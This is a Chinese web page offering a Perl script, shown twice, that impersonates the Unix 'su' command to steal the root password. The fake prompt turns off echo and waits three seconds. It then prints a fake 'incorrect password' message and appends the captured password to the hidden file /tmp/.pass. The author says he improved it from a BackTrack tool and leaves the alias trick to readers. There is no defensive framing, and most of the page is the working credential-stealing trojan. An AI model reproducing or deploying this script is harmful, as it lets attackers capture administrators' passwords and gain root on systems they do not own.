冒充su ,perl写的su.pl盗取root密码
更新时间:2008年09月14日 08:16:59 作者:
backtrack3里面/pentest/housekeeping里面有个超囧的偷root密码的东西,冒充su ,perl写的,管理员输入密码的时候还直接回显
我改了一下,把回显关了 加了个延时:
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!
#!/usr/bin/perl
# Written by xi4oyu <evil.xi4oyu@gmail.com>.
print "Password: ";
`stty -echo`;
$s1=<STDIN>;
print "\n";
`stty echo`;
sleep 3;
print "su: incorrect password\n";
chomp($s1);
$s2="Password is: ";
$s3=" ".`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ;
print users ($s2, $s1,$s3);
close (users);
很明显直接用是8行的,还有别名恢复等工作要做,各位看官自己搞定!
相关文章
perl常见问题集合之二...2007-03-03
本文和大家重点讨论一下Perl语法中Perl运算符的概念和用法,主要包括算术运算符,位运算符,赋值运算符和表运算符等内容,希望本文的介绍你对你有所帮助2013-03-03
对比两个文件并对数据进行筛选的perl脚本,涉及到哈希的应用和perl编程风格的改变。有需要的朋友可以参考下2013-03-03
对于perl操作mysql的步骤,说的比较详细,建议大家好好看看,参考2009-01-01
perl常问题集合之一...2007-03-03
本文和大家重点讨论一下Perl方法的概念,Perl方法定义不提供任何特殊语法,但规定Perl方法的第一个参数为对象或其被引用的包。Perl有两种Perl方法:静态Perl方法和虚Perl方法2013-03-03
perl写的生物突变的随机模拟程序,有需要的朋友可以参考下2013-03-03
这篇文章主要介绍了perl中srand与time函数的使用,需要的朋友可以参考下2013-03-03
本文向大家简单介绍一下Perl语法中Perl运算符的概念,Perl语言中Perl运算符有很多值得学习的地方,这里和大家分享一下它的概念和用法2013-03-03
Perl语言有很多值得学习的地方,你对Perl语法中的变量是否熟悉,Perl变量分为标量变量,数组变量,联系关系数组变量3类2013-03-03
最新评论